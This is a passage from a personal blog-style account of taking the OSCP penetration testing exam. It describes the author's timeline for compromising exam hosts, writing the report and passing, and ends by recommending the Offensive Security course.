This is how I organized the whole exam from start to finish. Anytime I compromised a host, I changed the color of the host from black to green in CherryTree, saved my screenshots for everything, made sure I had the proof.txt/local.txt, and continued on.


The Exam:

When 16:00 rolled around, I had my headphones on and started working directly on a 25 point box and within 30 min, I had compromised one (1) 25 pointer. A few hours later I had knocked out the 10 pointer and a 20 pointer for a total of 55 points. I had three (3) boxes compromised and decided to take 15 min and get some food. When I came back I started working on the second 25 point host and by 23:00 local, I had it buttoned up for a total of 80 points. I backed up all my progress, made sure I had ample proof and screenshots and went to bed. I got up around 08:00 and told myself I would work on the last host (20 points) until 12:00 and if I didn’t get it, I would start on my report. I did this because I had to fly out early on Sunday morning for some work stuff and would not have time to compile the report on Sunday. Well, I could not figure out the last box so I started on the report and worked on it from 12:00 on Saturday afternoon to 01:00 on Sunday morning. Monday afternoon, I got word from Offensive Security that I had passed and holy shit I am still PUMPED about it!

Final Thoughts:

OSCP was an amazing experience that the folks at Offensive Security put a shit ton of effort into (maybe passion is the more accurate term). There’s nothing else like it out there! Without a doubt, I could not recommend the course and certification path more. If you’re still reading this and have not jumped into the PWK course let me just say this, there will never be a “good” time to start and you are not going to be 100% ready. We all work, a lot of us have kids and families, but this is worth the work!


OSCE, here I come.

